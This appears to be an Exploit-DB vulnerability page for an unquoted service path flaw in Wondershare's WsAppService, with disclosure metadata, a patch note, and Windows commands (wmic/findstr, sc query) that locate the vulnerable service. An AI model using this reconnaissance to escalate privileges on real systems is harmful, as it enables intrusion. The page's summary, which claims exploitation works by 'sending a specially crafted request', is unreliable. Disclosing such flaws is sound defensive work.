Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path

vendor:

Wondershare Application Framework Service

by:

chuyreds

7.8

CVSS

HIGH

Unquote Service Path

CWE

Product Name: Wondershare Application Framework Service

Affected Version From: 2.4.3.231

Affected Version To: 2.4.3.231

Patch Exists: YES

Related CWE: N/A

CPE: a:wondershare:wondershare_application_framework_service

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home Single Language

2019

Wondershare Application Framework Service 2.4.3.231 – ‘WsAppService’ Unquote Service Path

A vulnerability exists in Wondershare Application Framework Service 2.4.3.231, which allows an attacker to gain elevated privileges by exploiting the 'WsAppService' Unquote Service Path. The vulnerability is due to the lack of proper validation of the service path. An attacker can exploit this vulnerability by sending a specially crafted request to the service path. Successful exploitation of this vulnerability could result in the attacker gaining elevated privileges.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A

# Explot-Wondershare WsAppService.txt

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Application Framework Service           WsAppService      C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe         Auto


C:\Users\user>sc query WsAppService

NOMBRE_SERVICIO: WsAppService
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        CÓD_SALIDA_WIN32   : 0  (0x0)
        CÓD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIÓN_INICIO  : 0x0